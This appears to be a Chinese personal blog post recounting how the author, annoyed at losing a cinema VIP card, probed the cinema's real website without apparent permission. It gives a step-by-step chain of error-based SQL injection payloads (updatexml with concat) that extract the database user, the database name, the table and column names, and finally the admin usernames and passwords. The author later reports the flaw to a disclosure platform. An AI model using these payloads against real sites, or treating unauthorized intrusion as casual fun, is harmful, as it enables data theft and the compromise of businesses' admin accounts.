晚安 "你别急,我会慢慢的走出你的世界,不留痕迹"
记一次报错注入漏洞记录
发表于 2019-6-29 | | 挖洞骚姿势


0x00 前言

最近闲来无事,想去看电影,然后脑子里想到我以前办过的一张家附近影院的VIP卡,但是不见了!很气愤,就去安全检测了一波他们的官网!!!


0x01 生死看淡,不服就干!

打开某影院的官方网站。

Image

嗯哼?好像发现了非常有趣的参数!直接一个单引号',报错了,嘿嘿,报错型注入。【天助我也啊!】

Image直接上PayLoad:

' and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) --+   //获取数据库用户名

Image

恩舒服了。我们继续爆数据库的库名,PayLoad:

' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+

Image

继续深入PayLoad暴库:

' and updatexml(1,concat(0x7e,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

Image


得到了数据库的表了,我就继续深入得到admin表里面的列:

' and updatexml(1,concat(0x7e,(SELECT group_concat(column_name) from information_schema.columns where table_name='admin'),0x7e),1) --+

Image

然后继续得到admin列里面的数据:

' and updatexml(1,concat(0x7e,(SELECT group_concat(id,'--',username,'--',password,'--',lv,'--') from admin),0x7e),1) --+

Image

ok,成功得到了数据。

0x02 结言

难受的是我搞了半天不知道后台地址,所以就算得到了用户名密码我也进不去啊!(⊙o⊙)…

所以我也不就继续搞下去了,但是注入还是有的,提交到某漏洞提交平台就结束了这次的挖掘。

(宝宝心里苦啊!!!)

发表评论:

TOP